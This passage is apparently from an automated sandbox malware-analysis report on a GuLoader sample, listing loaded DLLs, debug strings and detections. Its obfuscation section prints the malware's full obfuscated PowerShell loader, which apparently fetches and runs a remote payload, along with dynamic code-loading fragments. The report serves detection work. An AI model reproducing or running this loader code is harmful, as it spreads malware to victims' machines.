                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeSection loaded: cryptbase.dll
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeSection loaded: mswsock.dll
                        Source: C:\Program Files\Windows Media Player\wmplayer.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\dllhost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: Binary string: m.Core.pdb source: powershell.exe, 00000007.00000002.1781112542.00000000079AC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb9 source: powershell.exe, 00000007.00000002.1781112542.000000000792A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdb source: msiexec.exe, 00000009.00000003.1942259235.00000000238F0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1781112542.000000000792A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdb source: svchost.exe, 0000000D.00000003.1946639469.00000000056C0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdb source: msiexec.exe, 00000009.00000003.1941650537.0000000023AE0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 00000009.00000003.1941909081.00000000238F0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdbUGP source: msiexec.exe, 00000009.00000003.1941650537.0000000023AE0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: msiexec.exe, 00000009.00000003.1941909081.00000000238F0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: win32u.pdb source: wmplayer.exe
                        Source: Binary string: wkernel32.pdbUGP source: msiexec.exe, 00000009.00000003.1942259235.00000000238F0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdbUGP source: svchost.exe, 0000000D.00000003.1946639469.00000000056C0000.00000004.00000001.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        VBScript performs obfuscated calls to suspicious functions
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$", "Unsupported parameter type 00000000")
                        Yara detected GuLoader
                        Source: Yara matchFile source: 00000007.00000002.1773360781.000000000607D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1788756051.0000000008D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1555228381.0000021D90071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1789176550.000000000952F000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        .NET source code contains potential unpacker
                        Source: 14.3.svchost.exe.24f6aabc070.0.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 14.3.svchost.exe.24f6aabc070.0.raw.unpack, Runtime.cs.Net Code: CoreMain
                        Source: 14.3.svchost.exe.24f6aabc070.3.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 14.3.svchost.exe.24f6aabc070.3.raw.unpack, Runtime.cs.Net Code: CoreMain
                        Source: 14.3.svchost.exe.24f6aabc070.2.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 14.3.svchost.exe.24f6aabc070.2.raw.unpack, Runtime.cs.Net Code: CoreMain
                        Source: 14.3.svchost.exe.24f6aabc070.1.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 14.3.svchost.exe.24f6aabc070.1.raw.unpack, Runtime.cs.Net Code: CoreMain
                        Found suspicious powershell code related to unpacking or dynamic code loading
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Irreversibly)$Global:maKSImERIngErNES = [sysTem.TEXT.enCoDInG]::asCii.GetString($coNtrARIwISe)$GLObAl:aLDrendE=$mAKSIMErIngERnes.subStrInG($alDeRsbestEmMELSErne,$yelLOwcUP)<#Uvirkeli
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Udendrsarbejdets $Osteosynovitis $Forbryderspirens), (Restaurationskkkenets @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Pseudoofficially = [AppDomain]:
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Stednavnsforskningen93)), $rgelsen).DefineDynamicModule($Fibrinolysis, $false).DefineType($fucation, $Assumes, [System.MulticastDelega
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Irreversibly)$Global:maKSImERIngErNES = [sysTem.TEXT.enCoDInG]::asCii.GetString($coNtrARIwISe)$GLObAl:aLDrendE=$mAKSIMErIngERnes.subStrInG($alDeRsbestEmMELSErne,$yelLOwcUP)<#Uvirkeli
                        Suspicious powershell command line found
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKl
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKl
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKlJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAC260962 push E95B44D0h; ret 4_2_00007FFAAC2609C9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFAAC33437F push ds; iretd 4_2_00007FFAAC33438F
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04D423AF pushad ; iretd 7_2_04D423BA
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04D4FCC5 push eax; retf 7_2_04D4FCC9
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_3_02D318C0 push ebp; retf 13_3_02D318C1
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_3_02D328ED push ebx; ret 13_3_02D328E4
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_3_02D3588E push eax; iretd 13_3_02D3589D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_3_02D358BC pushad ; ret 13_3_02D358C1
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_3_02D3225D push eax; ret 13_3_02D3225F
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_3_02D36012 push 00000038h; iretd 13_3_02D3601D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_3_02D35606 pushad ; retf 13_3_02D35619
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_3_02D30FEA push eax; ret 13_3_02D30FF5
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_3_02D35FEE push FFFFFFD2h; retf 13_3_02D36011
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_3_02D3278B push ebx; ret 13_3_02D328E4
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_3_02D31179 push FFFFFF82h; iretd 13_3_02D3117B
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_3_02D35F0C push es; iretd 13_3_02D35F0D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_3_02D34920 push 0000002Eh; iretd 13_3_02D34922
